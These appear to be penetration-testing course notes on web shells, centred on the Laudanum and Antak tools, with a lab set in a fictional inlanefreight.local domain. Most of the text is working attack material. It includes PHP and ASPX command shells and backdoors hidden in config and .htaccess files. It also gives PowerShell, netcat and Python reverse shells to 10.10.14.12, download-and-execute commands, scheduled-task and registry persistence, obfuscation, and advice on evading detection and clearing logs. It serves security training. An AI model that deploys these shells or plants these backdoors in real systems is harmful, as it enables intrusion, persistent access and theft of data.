πWeb Shells
Overview
Web shells are server-side scripts that provide remote access to web servers through web browsers. They serve as a critical component in web application penetration testing, allowing attackers to execute commands, upload files, and maintain persistence on compromised web servers.
Why Web Shells Matter
Strategic Advantages:
Browser-based access: No special client software required
Firewall evasion: Traffic appears as normal HTTP/HTTPS
Persistent access: Remains accessible through web interface
Platform agnostic: Works across different operating systems
Stealth operations: Blends with legitimate web traffic
Common Use Cases:
Initial access: Gain foothold through file upload vulnerabilities
Persistence: Maintain access after initial compromise
Lateral movement: Pivot to other systems from web server
Data exfiltration: Download sensitive files through web interface
Command execution: Run system commands remotely
Introduction to Laudanum
What is Laudanum?
Laudanum is a comprehensive repository of ready-made web shell files designed for penetration testing and security assessments. It provides a collection of injectable files that can be used to:
Receive reverse shell connections
Execute commands directly from browser
Upload and download files
Enumerate system information
Establish persistence on web servers
Supported Technologies
Laudanum includes web shells for multiple web application languages:
ASP
.asp
Classic ASP applications (IIS)
ASPX
.aspx
ASP.NET applications (IIS)
JSP
.jsp
Java Server Pages (Tomcat, WebLogic)
PHP
.php
PHP applications (Apache, Nginx)
CFML
.cfm
ColdFusion applications
Perl
.pl
Perl CGI scripts
Installation and Availability
Default Distributions:
Kali Linux: Pre-installed in
/usr/share/laudanumParrot OS: Built-in by default
Other Distributions: Manual installation required
Manual Installation:
# Clone from GitHub
git clone https://github.com/laudanum-shells/laudanum.git
# Or download specific release
wget https://github.com/laudanum-shells/laudanum/archive/master.zipWorking with Laudanum
File Locations
Default Path Structure:
/usr/share/laudanum/
βββ asp/
β βββ shell.asp
β βββ cmd.asp
β βββ upload.asp
βββ aspx/
β βββ shell.aspx
β βββ cmd.aspx
β βββ upload.aspx
βββ jsp/
β βββ shell.jsp
β βββ cmd.jsp
β βββ upload.jsp
βββ php/
β βββ shell.php
β βββ cmd.php
β βββ upload.php
βββ cfm/
βββ shell.cfmPreparation and Customization
Essential Modifications
Before deploying Laudanum shells, several modifications are typically required:
IP Address Configuration: Set attacking host IP for reverse connections
Remove Signatures: Delete ASCII art and obvious comments
Obfuscation: Modify variable names and structure
Authentication: Add password protection if needed
Basic Configuration Steps
Step 1: Copy for Modification
cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspxStep 2: Edit Configuration
nano /home/tester/demo.aspx
# or
vim /home/tester/demo.aspxStep 3: Modify Allowed IPs
// Example from ASPX shell
string[] allowedIps = {"10.10.14.12", "127.0.0.1"};Security Considerations
Operational Security:
Remove identifying markers: ASCII art, author comments, default variables
Customize appearance: Change interface styling and text
Implement authentication: Add password or session-based protection
Limit functionality: Remove unnecessary features to reduce detection risk
Detection Avoidance:
Rename files: Use inconspicuous filenames
Modify signatures: Change known strings and patterns
Use legitimate directories: Place in expected locations
Timestamp manipulation: Match file creation times
Practical Web Shell Deployment
Target Environment Setup
For demonstration purposes, we'll work with a web application that has file upload functionality.
Prerequisites:
Target web application with upload capability
Appropriate file type acceptance (ASP, ASPX, PHP, etc.)
Web server write permissions
Network connectivity for testing
Environment Configuration:
# Add to /etc/hosts for lab environment
echo "<target_ip> status.inlanefreight.local" >> /etc/hostsStep-by-Step Deployment
Step 1: Shell Preparation
Copy Laudanum Shell:
cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspxModify Configuration:
// Line 59 - Add your attacking IP
string[] allowedIps = {"10.10.14.12", "127.0.0.1"};Recommended Modifications:
// Original (REMOVE)
/*
Laudanum Project
Copyright (C) 2006-2016 Kevin Johnson and the Laudanum team
http://laudanum.inguardians.com/
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
*/
// Remove ASCII art and obvious signatures
// Change variable names for obfuscation
// Modify interface stylingStep 2: File Upload Process
Locate Upload Functionality:
Look for file upload forms on target application
Identify upload directories and naming conventions
Test file type restrictions and filtering
Upload the Shell:
Navigate to upload functionality
Select modified web shell file
Submit upload request
Note success message and file location
Example Upload Result:
File uploaded successfully to: \\files\demo.aspxStep 3: Shell Access
Navigate to Uploaded Shell:
# Original path from upload response
status.inlanefreight.local\\files\demo.aspx
# Browser automatically converts to
status.inlanefreight.local//files/demo.aspxAccess Web Shell Interface:
Open browser and navigate to shell location
Verify shell loads correctly
Test command execution functionality
Command Execution Examples
Basic System Information
Windows Commands:
systeminfo
whoami
hostname
ipconfig /all
tasklist
net userLinux Commands:
uname -a
whoami
hostname
ifconfig
ps aux
cat /etc/passwdFile System Operations
Directory Listing:
# Windows
dir C:\
dir C:\Users\
# Linux
ls -la /
ls -la /home/File Operations:
# Windows
type C:\Windows\System32\drivers\etc\hosts
copy file.txt C:\temp\
# Linux
cat /etc/hosts
cp file.txt /tmp/Network Enumeration
Active Connections:
# Windows
netstat -an
arp -a
route print
# Linux
netstat -tulpn
arp -a
route -nAdvanced Web Shell Techniques
Shell Upgrade Strategies
From Web Shell to Reverse Shell
PowerShell Reverse Shell:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.12',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"Netcat Reverse Shell (Linux):
nc -e /bin/bash 10.10.14.12 4444Python Reverse Shell:
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.12',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"File Upload and Download
Upload Files via Web Shell:
Use built-in upload functionality
Transfer tools and payloads
Upload privilege escalation exploits
Download Sensitive Files:
# Windows
type C:\Users\Administrator\Desktop\flag.txt
copy "C:\Program Files\App\config.xml" C:\inetpub\wwwroot\files\
# Linux
cat /etc/shadow
cp /etc/passwd /var/www/html/Web Shell Customization
Custom PHP Web Shell
Minimal PHP Shell:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
<html>
<body>
<form method="GET">
<input type="text" name="cmd" placeholder="Enter command">
<input type="submit" value="Execute">
</form>
</body>
</html>Advanced PHP Shell with Features:
<?php
session_start();
$password = "test123";
if(!isset($_SESSION['authenticated']) && $_POST['pass'] != $password) {
echo '<form method="POST"><input type="password" name="pass"><input type="submit" value="Login"></form>';
exit;
}
$_SESSION['authenticated'] = true;
if(isset($_REQUEST['cmd'])){
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
<html>
<body>
<form method="GET">
<input type="text" name="cmd" value="<?php echo $_REQUEST['cmd']; ?>">
<input type="submit" value="Execute">
</form>
</body>
</html>Custom ASPX Web Shell
Basic ASPX Command Shell:
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e)
{
if (Request["cmd"] != null)
{
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + Request["cmd"];
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.Start();
Response.Write("<pre>" + p.StandardOutput.ReadToEnd() + "</pre>");
}
}
</script>
<html>
<body>
<form>
<input type="text" name="cmd" />
<input type="submit" value="Execute" />
</form>
</body>
</html>Persistence Techniques
Hidden Web Shells
Steganographic Embedding:
<?php
// Legitimate-looking code
function generateReport($data) {
return array_sum($data) / count($data);
}
// Hidden functionality
if($_GET['debug'] == 'admin') {
eval($_POST['code']);
}
?>Configuration File Injection:
// Within existing config file
$config = array(
'database' => 'localhost',
'username' => 'dbuser'
);
// Hidden shell
if($_GET['maint']) { system($_GET['cmd']); }.htaccess Shells
Apache .htaccess Shell:
AddType application/x-httpd-php .htaccess
# <?php system($_GET['cmd']); ?>Detection and Evasion
Common Detection Methods
Signature-Based Detection:
Known web shell signatures in files
Suspicious function calls (system, exec, eval)
Common web shell strings and patterns
File upload monitoring
Behavioral Detection:
Unusual command execution patterns
Abnormal file access behaviors
Suspicious network connections
Process creation monitoring
Log Analysis:
Web server access logs
System command execution logs
File modification timestamps
Network connection logs
Evasion Techniques
Code Obfuscation
PHP Obfuscation:
<?php
$a = 'system';
$b = $_GET['cmd'];
$a($b);
?>
// Or using base64
<?php
eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7'));
?>Variable Function Calls:
<?php
$functions = array('system', 'exec', 'shell_exec');
$func = $functions[0];
$func($_GET['cmd']);
?>Traffic Obfuscation
Encrypted Communication:
<?php
$key = 'secretkey';
$cmd = openssl_decrypt($_POST['data'], 'AES-256-CBC', $key);
system($cmd);
?>Covert Channels:
<?php
// Command in cookie
if(isset($_COOKIE['session'])) {
system(base64_decode($_COOKIE['session']));
}
?>File System Evasion
Timestamp Manipulation:
# Match timestamps to legitimate files
touch -r /var/www/html/index.php /var/www/html/shell.phpHidden Directories:
# Use hidden directories
mkdir /var/www/html/.config
cp shell.php /var/www/html/.config/update.phpBest Practices and Operational Security
Deployment Guidelines
Reconnaissance First
Identify web server technology
Determine supported file types
Map upload functionality
Test file restrictions
Shell Customization
Remove identifying signatures
Implement authentication
Customize appearance
Limit functionality as needed
Access Management
Use HTTPS when possible
Implement session management
Monitor access attempts
Plan for emergency removal
Security Considerations
Authorization Scope
Only deploy on authorized targets
Follow engagement rules
Document shell locations
Remove after testing completion
Operational Security
Use encrypted connections
Avoid suspicious commands
Monitor detection systems
Maintain access logs
Cleanup Procedures
Remove shells after use
Clear access logs if possible
Document artifacts created
Verify complete removal
Troubleshooting Common Issues
Upload Problems
File Type Restrictions:
# Try different extensions
shell.php -> shell.php.txt -> shell.txt
shell.aspx -> shell.txt -> shell.aspSize Limitations:
# Create minimal shells
<?php system($_GET['c']); ?>Content Filtering:
# Obfuscate suspicious strings
str_replace('system', 'sys'.'tem', $func);Execution Issues
Permission Problems:
# Check file permissions
ls -la shell.php
# Set executable permissions
chmod +x shell.phpPath Issues:
# Use absolute paths
/bin/ls instead of ls
C:\Windows\System32\cmd.exe instead of cmdEnvironment Variables:
# Set PATH if needed
export PATH=/usr/local/bin:/usr/bin:/binLegal and Ethical Considerations
Authorized Testing Only
Requirements:
Written authorization for target systems
Clear scope definition
Agreed-upon testing methods
Incident response procedures
Documentation:
Record all shell deployments
Document access times and activities
Maintain evidence chain
Prepare removal procedures
Responsible Disclosure
Best Practices:
Remove shells immediately after testing
Report vulnerabilities to stakeholders
Provide remediation guidance
Follow coordinated disclosure timelines
Antak Webshell
Introduction to ASPX
What is ASPX?
Active Server Page Extended (ASPX) is a file type/extension written for Microsoft's ASP.NET Framework. Key characteristics:
Server-side technology: Runs on web servers with ASP.NET Framework
Dynamic content generation: Web form pages generated for user input
HTML conversion: Server-side information converted to HTML
Windows integration: Native integration with Windows operating systems
How ASPX Works
Processing Flow:
User request: Browser requests ASPX page
Server processing: ASP.NET Framework processes server-side code
HTML generation: Dynamic content converted to HTML
Client response: HTML sent to user's browser
Security Implications:
Code execution: Can execute server-side commands
System interaction: Direct access to underlying Windows OS
Framework integration: Leverages .NET Framework capabilities
Antak Webshell Overview
What is Antak?
Antak is a sophisticated web shell built in ASP.NET and included within the Nishang project. It provides:
PowerShell integration: Native PowerShell command execution
Advanced UI: PowerShell-themed interface
Memory execution: Script execution in memory
Command encoding: Built-in command obfuscation
Nishang Project Context
Nishang is an Offensive PowerShell toolset that provides:
Comprehensive toolkit: Options for entire pentest lifecycle
PowerShell focus: Windows-centric attack tools
Multiple modules: Various attack and post-exploitation tools
Active development: Regularly updated and maintained
Antak Features and Capabilities
Core Functionality
PowerShell Console Simulation:
Native PowerShell: Full PowerShell command support
Process isolation: Each command executes as new process
Interactive interface: Console-like user experience
Command history: Previous commands accessible
Advanced Features:
File operations: Upload and download capabilities
Script execution: Memory-based script execution
Command encoding: Automatic command obfuscation
SQL integration: Database query capabilities
Configuration parsing: web.config file analysis
Technical Advantages
PowerShell Integration:
Native Windows: Leverages built-in Windows capabilities
Administrative tasks: Full administrative command access
.NET Framework: Complete framework functionality
Module support: PowerShell module loading
Security Features:
Authentication: Built-in user/password protection
Access control: Restricted access to authorized users
Session management: Secure session handling
Working with Antak
File Location and Setup
Default Location:
/usr/share/nishang/Antak-WebShell/
βββ antak.aspx # Main web shell file
βββ Readme.md # DocumentationFile Listing:
ls /usr/share/nishang/Antak-WebShell
antak.aspx Readme.mdPreparation and Customization
Step 1: Copy for Modification
cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspxStep 2: Configure Authentication
// Line 14 - Modify credentials
if (Request.Form["userpassword"] == "htb-student" && Request.Form["password"] == "htb-student")
{
// Original example
if (Request.Form["userpassword"] == "Disclaimer" && Request.Form["password"] == "ForLegitUseOnly")
}Step 3: Security Hardening
// Remove identifying information
/*
Antak Webshell
Author: nikhil_mitt
http://www.labofapenetrationtester.com
*/
// Remove ASCII art and obvious signatures
// Change variable names for obfuscation
// Modify interface styling and textPractical Antak Deployment
Environment Setup
Prerequisites:
Windows server with ASP.NET Framework
IIS web server running
File upload capability on target application
Network connectivity for testing
Lab Configuration:
# Add to /etc/hosts
echo "<target_ip> status.inlanefreight.local" >> /etc/hostsDeployment Process
Step 1: Upload Modified Shell
Navigate to target application upload functionality
Select modified
Upload.aspxfileSubmit upload request
Note file location (typically
\\files\directory)
Step 2: Access Web Shell
# Navigate to uploaded shell
status.inlanefreight.local/files/upload.aspxStep 3: Authentication
Enter configured username and password
Gain access to Antak interface
Verify PowerShell functionality
Initial Shell Access
Login Interface:
Username: htb-student
Password: htb-student
[Login]Welcome Message:
Welcome to Antak - A Webshell which utilizes PowerShell.
Use help for more details.
Use clear to clear the screen.Antak Interface and Commands
User Interface Elements
Command Execution:
Submit: Execute entered commands
Browse: File system navigation
Upload the File: File upload functionality
Encode and Execute: Obfuscated command execution
Download: File download capabilities
Parse web.config: Configuration file analysis
Execute SQL Query: Database interaction
Basic PowerShell Commands
System Information:
# Get system information
Get-ComputerInfo
systeminfo
# Current user context
whoami
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
# PowerShell version
$PSVersionTableFile System Operations:
# Directory listing
Get-ChildItem C:\
ls C:\Users\
# File operations
Get-Content C:\Windows\System32\drivers\etc\hosts
Copy-Item file.txt C:\temp\
# Directory navigation
Set-Location C:\inetpub\wwwroot
cd C:\tempProcess Management:
# List processes
Get-Process
tasklist
# Service management
Get-Service
net start
net stop servicenameAdvanced Features
File Upload/Download:
# Upload files via interface
# Use "Browse" and "Upload the File" buttons
# Download files
# Use "Download" button with file pathScript Execution:
# Execute scripts in memory
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/script.ps1')
# Encoded execution
# Use "Encode and Execute" for obfuscationSQL Query Execution:
-- Database interaction
SELECT * FROM users;
SELECT name FROM sys.databases;Advanced Antak Techniques
Upgrading to Full Shell
PowerShell Reverse Shell:
# Execute through Antak interface
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.12',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()Meterpreter Integration:
# Download and execute Meterpreter payload
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/payload.ps1')Persistence Through Antak
Scheduled Tasks:
# Create scheduled task for persistence
schtasks /create /tn "WindowsUpdate" /tr "powershell.exe -ep bypass -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12/shell.ps1\")'" /sc daily /st 09:00Registry Persistence:
# Add registry run key
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsUpdate" -Value "powershell.exe -ep bypass -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12/shell.ps1\")'"Antak vs. Laudanum Comparison
Technology
ASP.NET/PowerShell
Multiple (ASP, PHP, JSP)
Interface
PowerShell-themed UI
Basic command interface
Authentication
Built-in user/password
IP-based restrictions
Features
Advanced (SQL, encoding)
Basic command execution
Platform
Windows/.NET focused
Cross-platform
Learning Curve
Moderate
Easy
Obfuscation
Built-in encoding
Manual modification
Security and Operational Considerations
Detection Signatures
Common Signatures:
// Remove these identifying strings
"Antak"
"nikhil_mitt"
"labofapenetrationtester"
"Nishang"Variable Obfuscation:
// Original
string userpassword = Request.Form["userpassword"];
// Obfuscated
string up = Request.Form["user"];
string pwd = Request.Form["pass"];Evasion Techniques
Code Modification:
// Change function names
void ExecuteCommand() -> void ProcessRequest()
void DisplayResult() -> void ShowOutput()
// Modify HTML structure
<title>Antak</title> -> <title>Admin Panel</title>Traffic Obfuscation:
# Use encoded commands through "Encode and Execute"
# Implement custom encryption for sensitive commands
# Use legitimate PowerShell modules when possibleLearning Resources
IPPSEC Video Resources
Recommended Learning:
IPPSEC.rocks: Search engine for penetration testing concepts
Keyword search: Search for "aspx" for related demonstrations
Video timestamps: Direct links to relevant sections
Practical examples: Real-world ASPX shell usage
Specific Recommendations:
Cereal walkthrough: ASPX shell demonstration (1:17:00 - 1:20:00)
File upload techniques: Various boxes showing upload methods
ASPX enumeration: Gobuster and directory discovery
Hands-on Practice
Lab Scenarios:
File upload exploitation: Practice with various upload filters
ASPX shell customization: Modify and deploy custom shells
PowerShell integration: Leverage advanced PowerShell features
Persistence establishment: Use Antak for persistent access
Troubleshooting Antak
Common Issues
Authentication Problems:
// Verify credential configuration
if (Request.Form["userpassword"] == "correctuser" && Request.Form["password"] == "correctpass")
// Check for typos in variable names
// Ensure proper string matchingPowerShell Execution Issues:
# Check PowerShell execution policy
Get-ExecutionPolicy
# Verify .NET Framework version
[System.Environment]::Version
# Test basic PowerShell functionality
$PSVersionTableFile Upload Problems:
# Verify file extension acceptance
.aspx -> .txt -> .asp
# Check file size limitations
# Verify upload directory permissionsPerformance Optimization
Memory Management:
# Clear variables after use
Remove-Variable -Name * -ErrorAction SilentlyContinue
# Garbage collection
[System.GC]::Collect()Connection Stability:
// Implement connection timeouts
// Add error handling for network issues
// Use connection pooling for database operationsConclusion
Web shells are powerful tools for maintaining access to web servers and executing remote commands through web interfaces. Both Laudanum and Antak provide comprehensive solutions for different scenarios:
Laudanum offers:
Multi-platform support: ASP, ASPX, PHP, JSP, and more
Simple deployment: Ready-to-use files with minimal modification
Basic functionality: Command execution and file operations
Wide compatibility: Works across different web technologies
Antak provides:
PowerShell integration: Native Windows PowerShell capabilities
Advanced features: Encoding, SQL queries, file operations
User-friendly interface: PowerShell-themed web interface
Built-in security: Authentication and session management
Key Takeaways:
Multiple technologies: Support for various web platforms
Customization required: Modify signatures and add authentication
Stealth operations: Blend with legitimate web traffic
Upgrade paths: Transition to more advanced shell types
Detection awareness: Understand and evade security controls
Responsible use: Deploy only on authorized targets
Success with web shells requires understanding target environments, proper customization, and careful operational security. Regular practice with different web technologies and deployment scenarios will improve proficiency and effectiveness in real-world penetration testing engagements. Both Laudanum and Antak serve as excellent starting points for developing advanced web shell capabilities.
Last updated